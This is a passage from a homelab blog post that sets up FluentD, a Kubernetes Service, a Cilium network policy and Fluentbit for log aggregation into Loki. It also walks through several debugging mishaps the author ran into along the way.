</span></span><span style="display:flex;"><span>      <span style="color:#f92672">storage</span>: <span style="color:#ae81ff">4Gi</span>
</span></span></code></pre></div><p>And here is the Deployment for FluentD:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apps/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Deployment</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">fluentd</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replicas</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">app</span>: <span style="color:#ae81ff">fluentd</span>
</span></span><span style="display:flex;"><span>      {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>      {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>      {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#e6db74">&#34;Recreate&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">app</span>: <span style="color:#ae81ff">fluentd</span>
</span></span><span style="display:flex;"><span>        {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>        {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>        {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">checksum/config</span>: {{ <span style="color:#ae81ff">include (print $.Template.BasePath &#34;/config.yaml&#34;) . | sha256sum }}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">automountServiceAccountToken</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">securityContext</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">fsGroup</span>: <span style="color:#ae81ff">1000</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">fluentd</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">registry.mei-home.net/homenet/fluentd:{{ .Values.appVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">scratch</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: {{ <span style="color:#ae81ff">.Values.mountDir }}</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">config</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/fluentd/etc</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">readOnly</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">200m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">500Mi</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">HL_NODE_NAME</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">fieldRef</span>:
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">fieldPath</span>: <span style="color:#ae81ff">spec.nodeName</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">livenessProbe</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">httpGet</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">port</span>: {{ <span style="color:#ae81ff">.Values.ports.health }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">path</span>: <span style="color:#e6db74">&#34;/&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">initialDelaySeconds</span>: <span style="color:#ae81ff">15</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">periodSeconds</span>: <span style="color:#ae81ff">30</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">syslog-tcp</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.ports.syslog }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">syslog-udp</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.ports.syslog }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">UDP</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">syslog-tls</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.ports.syslogTls }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">log-shippers</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.ports.logShippers }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">k8s</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.ports.k8sLogs }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">netconsole</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.ports.netconsole }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">UDP</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">scratch</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">persistentVolumeClaim</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">claimName</span>: <span style="color:#ae81ff">scratch-volume</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">config</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">configMap</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">name</span>: <span style="color:#ae81ff">fluentd-conf</span>
</span></span></code></pre></div><p>The only new thing I learned here is how to access fields from the Pod spec
via environment variables, which I use to put the node name into the <code>HL_NODE_NAME</code>
env variable. I later use this to add the node name to FluentD&rsquo;s own logs.</p>
<p>Next, the Service. This is of type LoadBalancer, as FluentD handles not only
the internal cluster logs, but also the logs from all of my hosts.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Service</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">fluentd</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/public-service</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">external-dns.alpha.kubernetes.io/hostname</span>: <span style="color:#ae81ff">log-aggregator.example.com</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">io.cilium/lb-ipam-ips</span>: <span style="color:#e6db74">&#34;10.86.55.66&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">LoadBalancer</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">externalTrafficPolicy</span>: <span style="color:#ae81ff">Local</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">app</span>: <span style="color:#ae81ff">fluentd</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">syslog-tcp</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">port</span>: <span style="color:#ae81ff">514</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">targetPort</span>: <span style="color:#ae81ff">syslog-tcp</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">syslog-udp</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">port</span>: <span style="color:#ae81ff">514</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">targetPort</span>: <span style="color:#ae81ff">syslog-udp</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">UDP</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">syslog-tls</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">port</span>: {{ <span style="color:#ae81ff">.Values.ports.syslogTls }}</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">targetPort</span>: <span style="color:#ae81ff">syslog-tls</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">log-shippers</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">port</span>: {{ <span style="color:#ae81ff">.Values.ports.logShippers }}</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">targetPort</span>: <span style="color:#ae81ff">log-shippers</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">k8s</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">port</span>: {{ <span style="color:#ae81ff">.Values.ports.k8sLogs }}</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">targetPort</span>: <span style="color:#ae81ff">k8s</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">netconsole</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">port</span>: {{ <span style="color:#ae81ff">.Values.ports.netconsole }}</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">targetPort</span>: <span style="color:#ae81ff">netconsole</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">UDP</span>
</span></span></code></pre></div><p>While setting up the service, I realized that I had forgotten the <code>syslog-udp</code>
entry in the port list. I added it, but the service did not show any Endpoints
for that particular port:</p>
<pre tabindex="0"><code>Port:                     syslog-udp  514/UDP
TargetPort:               syslog-udp/UDP
NodePort:                 syslog-udp  31268/UDP
Endpoints:
</code></pre><p>I tried to fix this by recreating the Pod, but to no avail. I finally found
<a href="https://ben-lab.github.io/kubernetes-UDP-TCP-bug-same-port/">this blog post</a>,
which proposed not just deleting the Pod, but also the Deployment - and that
did the trick.</p>
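<p>For reference, the fix boiled down to something along these lines (a sketch: the namespace is an assumption based on the
<code>fluentd.fluentd.svc.cluster.local</code> address used further below, and the chart path is hypothetical):</p>
<pre tabindex="0"><code># Delete the Deployment (and with it the Pod), not just the Pod itself
kubectl -n fluentd delete deployment fluentd
# Then re-apply the chart so Deployment and Service get recreated together
helm upgrade --install fluentd ./fluentd -n fluentd
</code></pre>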
<p>Another issue I hit came after I switched the syslog-ng configs for all of my
hosts over to the new FluentD on k8s. All hosts worked well - save for all of
my k8s nodes! None of them was able to connect to the FluentD service.
After quadruple-checking my firewall config, I finally had another facepalm
moment. My CiliumNetworkPolicy looked like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumNetworkPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;fluentd&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">endpointSelector</span>: {}
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">fromEndpoints</span>:
</span></span><span style="display:flex;"><span>      - {}
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">io.kubernetes.pod.namespace</span>: <span style="color:#ae81ff">fluentbit</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">fluentbit</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">fromEntities</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">world</span>
</span></span></code></pre></div><p>The issue with this config is: <code>world</code> doesn&rsquo;t mean &ldquo;absolutely everybody&rdquo;. It
only means &ldquo;everybody outside the k8s cluster&rdquo;. So my desktop, all
of my Nomad cluster nodes and my baremetal Ceph nodes were allowed - but the
k8s nodes were not! I&rsquo;m wondering how often I will read through <a href="https://docs.cilium.io/en/latest/security/policy/language/#entities-based">the Cilium docs</a>
before this migration is over. &#x1f605;
The solution is to add <code>remote-node</code> <em>and</em> <code>host</code> to the <code>fromEntities</code> list,
like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">fromEntities</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#ae81ff">world</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#ae81ff">remote-node</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#ae81ff">host</span>
</span></span></code></pre></div><p><code>remote-node</code> grants access to all cluster nodes which are not running the FluentD
Pod, while <code>host</code> means specifically the node which is currently running the Pod.</p>
<p>But that was not yet the end of my problems with the syslog setup. In my old
config, I had configured FluentD to check the IP address of the sender and look
it up in DNS to set the <code>host</code> field of the log message. For the life of me,
I cannot remember why I would do such a thing.
The problem was, again, with the k8s hosts. They were showing up with IPs, not
their proper hostnames. I recognized the IPs as the ones which Cilium assigns
to the <code>cilium_host</code> interface it creates. Those IPs are not routable in my
wider network and there are no corresponding PTR records in my DNS.</p>
<p>To realize that that was my problem, I had to break out Wireshark yet again.
This is becoming a theme in this migration. Looking closer at the messages,
I was able to see that the host field was set properly. An example message
looked like this:</p>
<pre tabindex="0"><code>&lt;30&gt;1 2024-01-29T22:16:56+01:00 khepri.home kubelet 19562 - - W0129 22:16:56.971140   19562 machine.go:65] Cannot read vendor id correctly, set empty.
</code></pre><p>And this host field, <code>khepri.home</code> here, should be used by default. But it wasn&rsquo;t,
due to having this option set:</p>
<pre tabindex="0"><code>source_hostname_key host
</code></pre><p>This makes FluentD go out to DNS, instead of just using the host field from the
message. Ah well, it had been almost two weeks since I last had to get out
Wireshark anyway. &#x1f612;</p>
<p>Last but most certainly not least was a problem with OPNsense. I had reconfigured
the logging target to the new domain, but nothing happened. No proper log entries,
nothing.
Turns out, after an hour or so of debugging: OPNsense&rsquo;s syslog-ng needed a full
restart, not just a config reload, to start using the new values. &#x1f926;</p>
<h2 id="fluentd-configs">FluentD configs</h2>
<p>Before moving on to Fluentbit and the k8s logs, I want to at least have a short
look at my FluentD base config and the syslog configs.</p>
<p>My main config file for FluentD looks like this:</p>
<pre tabindex="0"><code>&lt;system&gt;
  log_level info
&lt;/system&gt;
# Fluentd&#39;s own logs
# This is only intended to prepare the logs for forwarding
# to the services loki instance!
&lt;label @FLUENT_LOG&gt;
	&lt;match fluent.**&gt;
		@type record_modifier
		@label @K8S
		tag services.fluentd.fluentd
		&lt;record&gt;
          namespace_name fluentd
          container_name fluentd
          host &#34;#{ENV[&#39;HL_NODE_NAME&#39;]}&#34;
          level ${tag_parts[1]}
		&lt;/record&gt;
	&lt;/match&gt;
&lt;/label&gt;

# Healthcheck endpoint
&lt;source&gt;
  @type http_healthcheck
  port {{ .Values.ports.health }}
  bind 0.0.0.0
&lt;/source&gt;

# Syslog Handling
@include syslogs.conf

# Service logs coming from the Nomad jobs
@include nomad-srv-logs.conf

# k8s logs
@include k8s.conf
</code></pre><p>The main part is the configuration of FluentD&rsquo;s own logs. With this config,
they&rsquo;re still put to <code>stdout</code>, but they&rsquo;re also forwarded to my <code>K8S</code> label.
I will show that later. Now that I look at the config, it might be interesting
to see whether I could also provide the namespace and container name as ENV
variables and set the record content from those, instead of hardcoding them
here.</p>
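<p>Just to sketch what that could look like: FluentD evaluates <code>&#34;#{ENV[...]}&#34;</code> when the config is loaded, so assuming the
Deployment exported hypothetical <code>HL_NAMESPACE</code> and <code>HL_CONTAINER_NAME</code> variables (the former e.g. via the downward
API&rsquo;s <code>fieldRef: metadata.namespace</code>), the hardcoded record values could become:</p>
<pre tabindex="0"><code>&lt;record&gt;
  namespace_name &#34;#{ENV[&#39;HL_NAMESPACE&#39;]}&#34;
  container_name &#34;#{ENV[&#39;HL_CONTAINER_NAME&#39;]}&#34;
  host &#34;#{ENV[&#39;HL_NODE_NAME&#39;]}&#34;
  level ${tag_parts[1]}
&lt;/record&gt;
</code></pre>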
<p>In the <code>syslogs.conf</code> file, I&rsquo;m setting up the syslog handling:</p>
<pre tabindex="0"><code>&lt;source&gt;
	@type syslog
	port {{ .Values.ports.syslogTls }}
	bind 0.0.0.0
	tag syslogs.new
  severity_key level
	frame_type octet_count
	&lt;transport tcp&gt;
	&lt;/transport&gt;
	&lt;parse&gt;
		message_format auto
	&lt;/parse&gt;
&lt;/source&gt;

&lt;filter syslogs.new.**&gt;
  @type grep
  &lt;exclude&gt;
    key message
    pattern /^.* too long to fit into unit name, ignoring mount point\.$/
  &lt;/exclude&gt;
&lt;/filter&gt;

&lt;match syslogs.**&gt;
  @type route
  &lt;route syslogs.**&gt;
    @label @SYSLOGS
    copy
  &lt;/route&gt;
&lt;/match&gt;

&lt;label @SYSLOGS&gt;
  &lt;match syslogs.**&gt;
    @type loki
    url &#34;http://loki.loki.svc.cluster.local:3100&#34;
    extra_labels {&#34;job&#34;:&#34;syslogs&#34;}
    &lt;label&gt;
      host $.host
    &lt;/label&gt;
    &lt;buffer host&gt;
      path /fluentd/log/buffers/loki.syslog.*.buffer
      @type file
      total_limit_size 5GB
      flush_at_shutdown true
      flush_mode interval
      flush_interval 5s
      chunk_limit_size 5MB
    &lt;/buffer&gt;
  &lt;/match&gt;
&lt;/label&gt;
</code></pre><p>I have removed some content here, as a lot of it is repetitive code for
the different ports I need to listen on for the different syslog formats and
transports.</p>
<p>The <code>&lt;source&gt;</code> will listen on the <code>syslogTls</code> port for incoming syslog messages
and tag them properly. The parsing, luckily, can be automated as FluentD has
the ability to automatically detect whether it&rsquo;s an RFC3164 or a RFC5424 formatted
message.</p>
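<p>One of the removed sections, for example the plain UDP listener, presumably looks roughly like this (a sketch mirroring the
TLS source above, reusing the <code>syslog</code> port from the Deployment):</p>
<pre tabindex="0"><code>&lt;source&gt;
  @type syslog
  port {{ .Values.ports.syslog }}
  bind 0.0.0.0
  tag syslogs.new
  severity_key level
  &lt;transport udp&gt;
  &lt;/transport&gt;
  &lt;parse&gt;
    message_format auto
  &lt;/parse&gt;
&lt;/source&gt;
</code></pre>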
<p>In the <code>@type grep</code> filter, I&rsquo;m dropping one specific log line, looking like this:</p>
<pre tabindex="0"><code>Mount point path &#39;/var/lib/kubelet/plugins/kubernetes.io/csi/rook-ceph.rbd.csi.ceph.com/7fa64edb6fced4ed6d5acd3643506bc6a3ea6bea547f6a6c2997653e203f4857/globalmount/0001-...too long to fit into unit name, ignoring mount point
</code></pre><p>These incredibly annoying lines are sent by systemd, with <code>warning</code> severity.
See e.g. <a href="https://github.com/docker/for-linux/issues/679">this docker bug report</a>.
These messages also come up on my Nomad cluster, for the same reason: CSI mounts.
From the GitHub issue it seems like there&rsquo;s now a way in systemd to avoid
these messages? Anyway, for now I&rsquo;m filtering in FluentD so that the endless repeats
of that line every 10 seconds don&rsquo;t pollute my logs.</p>
<p>Finally, I&rsquo;m using the <code>SYSLOGS</code> label. Labels in FluentD are something like
subtrees in the log pipeline. By default, every log record flows from its
<code>&lt;source&gt;</code> through the config until it hits a <code>&lt;match&gt;</code> section which fits its tag.
With labels, subsections combining several <code>&lt;filter&gt;</code> and <code>&lt;match&gt;</code> sections
can be created.</p>
<p>In this particular example, nothing special is done, just the
match section for the Loki output plugin. I&rsquo;m setting the URL of the internal
Loki service. The <code>&lt;label&gt;</code> section defines which Loki labels are set for the
log entry. Labels are Loki&rsquo;s index. It can search over the entirety of a log
entry, but the labels are more efficient, especially with separate log sources
like I have here, with container logs and host logs. For this I&rsquo;m setting the
<code>job</code> label, <code>syslogs</code> here. In addition, any given syslog stream is also
identified uniquely by the host which emitted the log, which is why I&rsquo;m adding
the host field as another label. All other fields in the record, like the syslog
ident, will also be stored in Loki of course, but they will simply be part of
the log line, and will not be indexed.</p>
<p>I&rsquo;m also setting up some local buffering, again with the host key as the buffer
key. I&rsquo;m giving the buffer a rather generous 5GB of max size, just to make sure
I don&rsquo;t run out of space for logs if something goes down during the night and
subsequent workday.</p>
<h1 id="fluentbit-setup">Fluentbit setup</h1>
<p>Final component of the logging setup: <a href="https://fluentbit.io/">Fluentbit</a>.
There&rsquo;s quite a large choice of log shippers. I ended up deciding on Fluentbit
because I was already running FluentD at the point where I wanted per-host
log shippers.</p>
<p>As I had mentioned in the overview, Fluentbit is mostly a dumb log shipper for me:
its config is kept pretty simple, letting FluentD do the heavy lifting. For
that reason, I was finally able to use an official Helm chart in this migration.
Fluentbit&rsquo;s can be found <a href="https://github.com/fluent/helm-charts/tree/main/charts/fluent-bit">here</a>.</p>
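<p>Getting it installed is then the usual Helm procedure, roughly like this (the release name and values file are of course mine/assumed;
the namespace matches the <code>fluentbit</code> namespace referenced in the network policy above):</p>
<pre tabindex="0"><code>helm repo add fluent https://fluent.github.io/helm-charts
helm repo update
helm install fluent-bit fluent/fluent-bit --namespace fluentbit --create-namespace -f values.yaml
</code></pre>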
<p>The general part of the <code>values.yaml</code> looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">testFramework</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">serviceMonitor</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">tolerations</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/taint.role&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">operator</span>: <span style="color:#e6db74">&#34;Equal&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;ceph&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">effect</span>: <span style="color:#e6db74">&#34;NoSchedule&#34;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">effect</span>: <span style="color:#ae81ff">NoSchedule</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">key</span>: <span style="color:#ae81ff">node-role.kubernetes.io/control-plane</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">Exists</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">fluentbit</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">podLabels</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">fluentbit</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">priorityClassName</span>: <span style="color:#e6db74">&#34;system-node-critical&#34;</span>
</span></span></code></pre></div><p>The only noteworthy part is setting the tolerations, so that Fluentbit is also
deployed on control plane nodes and, in my case, Ceph nodes. I&rsquo;ve also decided
to declare it node-critical, to prevent eviction.</p>
<p>More interesting than that is the <code>config:</code> section:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">config</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">inputs</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    [INPUT]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Name tail
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Path /var/log/containers/*.log
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        multiline.parser cri
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Tag kube.*
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Mem_Buf_Limit 5MB</span>
